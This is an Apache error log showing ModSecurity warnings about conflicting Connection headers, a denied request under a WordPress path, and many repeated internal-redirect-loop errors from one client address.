[Mon May 11 19:06:57.707306 2026] [security2:error] [pid 1501831:tid 1501857] [client 43.134.165.242:55448] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ventes-privees-auto.fr"] [uri "/"] [unique_id "agIMsVNddpkriGUb6ZVPPQAAARg"]
[Mon May 11 19:07:38.675767 2026] [authz_core:error] [pid 1502013:tid 1502046] [client 47.128.126.119:49146] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/error_log
[Mon May 11 19:08:02.086143 2026] [security2:error] [pid 1501883:tid 1501899] [client 43.135.133.194:52874] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIM8jP5Q_-MBliRCAxBRQAAAA4"]
[Mon May 11 19:08:07.616472 2026] [core:error] [pid 1501883:tid 1501892] [client 52.141.35.48:12143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:07.616802 2026] [core:error] [pid 1501883:tid 1501892] [client 52.141.35.48:12143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:08.325393 2026] [core:error] [pid 1501831:tid 1501847] [client 52.141.35.48:3544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:08.325428 2026] [core:error] [pid 1501831:tid 1501847] [client 52.141.35.48:3544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:09.037517 2026] [core:error] [pid 1424905:tid 1424916] [client 52.141.35.48:12113] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:09.037559 2026] [core:error] [pid 1424905:tid 1424916] [client 52.141.35.48:12113] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:09.786663 2026] [core:error] [pid 1501831:tid 1501845] [client 52.141.35.48:3526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:09.786689 2026] [core:error] [pid 1501831:tid 1501845] [client 52.141.35.48:3526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:10.516744 2026] [core:error] [pid 1502013:tid 1502046] [client 52.141.35.48:12102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:10.516790 2026] [core:error] [pid 1502013:tid 1502046] [client 52.141.35.48:12102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:11.234995 2026] [core:error] [pid 1501831:tid 1501836] [client 52.141.35.48:12112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:11.235034 2026] [core:error] [pid 1501831:tid 1501836] [client 52.141.35.48:12112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:11.938744 2026] [core:error] [pid 1424905:tid 1424913] [client 52.141.35.48:11278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:11.938783 2026] [core:error] [pid 1424905:tid 1424913] [client 52.141.35.48:11278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:12.717370 2026] [core:error] [pid 1501883:tid 1501909] [client 52.141.35.48:12129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:12.717404 2026] [core:error] [pid 1501883:tid 1501909] [client 52.141.35.48:12129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:13.508754 2026] [core:error] [pid 1501831:tid 1501841] [client 52.141.35.48:12137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:13.508787 2026] [core:error] [pid 1501831:tid 1501841] [client 52.141.35.48:12137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:14.216838 2026] [core:error] [pid 1424905:tid 1424918] [client 52.141.35.48:12110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:14.216873 2026] [core:error] [pid 1424905:tid 1424918] [client 52.141.35.48:12110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:14.920955 2026] [core:error] [pid 1501831:tid 1501834] [client 52.141.35.48:12128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:14.920988 2026] [core:error] [pid 1501831:tid 1501834] [client 52.141.35.48:12128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:15.622374 2026] [core:error] [pid 1501883:tid 1501894] [client 52.141.35.48:4059] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:15.622409 2026] [core:error] [pid 1501883:tid 1501894] [client 52.141.35.48:4059] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:16.331112 2026] [core:error] [pid 1424905:tid 1424930] [client 52.141.35.48:12101] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:16.331164 2026] [core:error] [pid 1424905:tid 1424930] [client 52.141.35.48:12101] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:17.094896 2026] [core:error] [pid 1502013:tid 1502047] [client 52.141.35.48:4076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:17.094931 2026] [core:error] [pid 1502013:tid 1502047] [client 52.141.35.48:4076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:17.795237 2026] [core:error] [pid 1502013:tid 1502035] [client 52.141.35.48:12154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:17.795271 2026] [core:error] [pid 1502013:tid 1502035] [client 52.141.35.48:12154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:18.556366 2026] [core:error] [pid 1424905:tid 1424926] [client 52.141.35.48:13858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:18.556391 2026] [core:error] [pid 1424905:tid 1424926] [client 52.141.35.48:13858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:19.283841 2026] [core:error] [pid 1501883:tid 1501895] [client 52.141.35.48:4032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:19.283873 2026] [core:error] [pid 1501883:tid 1501895] [client 52.141.35.48:4032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:19.987800 2026] [core:error] [pid 1502013:tid 1502041] [client 52.141.35.48:4053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:19.987834 2026] [core:error] [pid 1502013:tid 1502041] [client 52.141.35.48:4053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:20.689134 2026] [core:error] [pid 1424905:tid 1424921] [client 52.141.35.48:12123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:20.689182 2026] [core:error] [pid 1424905:tid 1424921] [client 52.141.35.48:12123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:21.398101 2026] [core:error] [pid 1501831:tid 1501857] [client 52.141.35.48:3566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:21.398130 2026] [core:error] [pid 1501831:tid 1501857] [client 52.141.35.48:3566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:22.106510 2026] [core:error] [pid 1501883:tid 1501901] [client 52.141.35.48:4056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:22.106537 2026] [core:error] [pid 1501883:tid 1501901] [client 52.141.35.48:4056] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:22.833082 2026] [core:error] [pid 1502013:tid 1502030] [client 52.141.35.48:3521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:22.833115 2026] [core:error] [pid 1502013:tid 1502030] [client 52.141.35.48:3521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:23.542509 2026] [core:error] [pid 1501831:tid 1501851] [client 52.141.35.48:12099] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:23.542548 2026] [core:error] [pid 1501831:tid 1501851] [client 52.141.35.48:12099] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:24.252177 2026] [core:error] [pid 1424905:tid 1424927] [client 52.141.35.48:4000] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:24.252232 2026] [core:error] [pid 1424905:tid 1424927] [client 52.141.35.48:4000] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:25.052755 2026] [core:error] [pid 1501883:tid 1501886] [client 52.141.35.48:4077] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:25.052788 2026] [core:error] [pid 1501883:tid 1501886] [client 52.141.35.48:4077] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:25.791472 2026] [core:error] [pid 1501883:tid 1501909] [client 52.141.35.48:3549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:25.791498 2026] [core:error] [pid 1501883:tid 1501909] [client 52.141.35.48:3549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:26.587074 2026] [core:error] [pid 1424905:tid 1424932] [client 52.141.35.48:4039] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:26.587102 2026] [core:error] [pid 1424905:tid 1424932] [client 52.141.35.48:4039] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:27.331128 2026] [core:error] [pid 1501831:tid 1501834] [client 52.141.35.48:7172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:27.331167 2026] [core:error] [pid 1501831:tid 1501834] [client 52.141.35.48:7172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:28.041201 2026] [core:error] [pid 1501883:tid 1501894] [client 52.141.35.48:13890] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:28.041234 2026] [core:error] [pid 1501883:tid 1501894] [client 52.141.35.48:13890] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:28.841985 2026] [core:error] [pid 1502013:tid 1502037] [client 52.141.35.48:3508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:28.842017 2026] [core:error] [pid 1502013:tid 1502037] [client 52.141.35.48:3508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:29.573620 2026] [core:error] [pid 1502013:tid 1502058] [client 52.141.35.48:3524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:29.573655 2026] [core:error] [pid 1502013:tid 1502058] [client 52.141.35.48:3524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:30.277580 2026] [core:error] [pid 1501831:tid 1501843] [client 52.141.35.48:4090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:30.277613 2026] [core:error] [pid 1501831:tid 1501843] [client 52.141.35.48:4090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:30.986356 2026] [core:error] [pid 1501883:tid 1501903] [client 52.141.35.48:4043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:30.986406 2026] [core:error] [pid 1501883:tid 1501903] [client 52.141.35.48:4043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:31.763825 2026] [core:error] [pid 1501883:tid 1501897] [client 52.141.35.48:4092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:31.763860 2026] [core:error] [pid 1501883:tid 1501897] [client 52.141.35.48:4092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:32.505922 2026] [core:error] [pid 1501831:tid 1501857] [client 52.141.35.48:3972] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:32.505948 2026] [core:error] [pid 1501831:tid 1501857] [client 52.141.35.48:3972] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:33.257301 2026] [core:error] [pid 1424905:tid 1424908] [client 52.141.35.48:4038] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:33.257341 2026] [core:error] [pid 1424905:tid 1424908] [client 52.141.35.48:4038] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:34.030322 2026] [core:error] [pid 1502013:tid 1502041] [client 52.141.35.48:3520] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:34.030353 2026] [core:error] [pid 1502013:tid 1502041] [client 52.141.35.48:3520] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:34.818942 2026] [core:error] [pid 1501831:tid 1501855] [client 52.141.35.48:3484] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:34.818994 2026] [core:error] [pid 1501831:tid 1501855] [client 52.141.35.48:3484] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:35.612717 2026] [core:error] [pid 1424905:tid 1424914] [client 52.141.35.48:4061] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:35.612739 2026] [core:error] [pid 1424905:tid 1424914] [client 52.141.35.48:4061] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:36.364777 2026] [core:error] [pid 1501883:tid 1501907] [client 52.141.35.48:13917] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:36.364809 2026] [core:error] [pid 1501883:tid 1501907] [client 52.141.35.48:13917] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:37.069245 2026] [core:error] [pid 1424905:tid 1424926] [client 52.141.35.48:4093] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:37.069277 2026] [core:error] [pid 1424905:tid 1424926] [client 52.141.35.48:4093] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:37.774811 2026] [core:error] [pid 1424905:tid 1424921] [client 52.141.35.48:13904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:37.774839 2026] [core:error] [pid 1424905:tid 1424921] [client 52.141.35.48:13904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:39.021348 2026] [core:error] [pid 1501883:tid 1501905] [client 52.141.35.48:7185] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:39.021385 2026] [core:error] [pid 1501883:tid 1501905] [client 52.141.35.48:7185] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:39.818731 2026] [core:error] [pid 1502013:tid 1502031] [client 52.141.35.48:7186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:39.818761 2026] [core:error] [pid 1502013:tid 1502031] [client 52.141.35.48:7186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:40.533843 2026] [core:error] [pid 1501883:tid 1501901] [client 52.141.35.48:3544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:40.533890 2026] [core:error] [pid 1501883:tid 1501901] [client 52.141.35.48:3544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:41.232576 2026] [security2:error] [pid 1424905:tid 1424910] [client 43.134.162.36:55148] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/feed/"] [unique_id "agINGYW8yzYoWG_eyCXN8QAAAUI"]
[Mon May 11 19:08:41.241644 2026] [core:error] [pid 1502013:tid 1502060] [client 52.141.35.48:13889] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:41.241671 2026] [core:error] [pid 1502013:tid 1502060] [client 52.141.35.48:13889] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:42.012007 2026] [core:error] [pid 1424905:tid 1424917] [client 52.141.35.48:3096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:42.012047 2026] [core:error] [pid 1424905:tid 1424917] [client 52.141.35.48:3096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:42.747536 2026] [core:error] [pid 1501883:tid 1501889] [client 52.141.35.48:13941] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:42.747564 2026] [core:error] [pid 1501883:tid 1501889] [client 52.141.35.48:13941] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:43.456090 2026] [core:error] [pid 1502013:tid 1502038] [client 52.141.35.48:7184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:43.456130 2026] [core:error] [pid 1502013:tid 1502038] [client 52.141.35.48:7184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:44.164810 2026] [core:error] [pid 1501831:tid 1501839] [client 52.141.35.48:3579] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:44.164852 2026] [core:error] [pid 1501831:tid 1501839] [client 52.141.35.48:3579] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:44.875391 2026] [core:error] [pid 1501883:tid 1501888] [client 52.141.35.48:4042] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:44.875421 2026] [core:error] [pid 1501883:tid 1501888] [client 52.141.35.48:4042] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
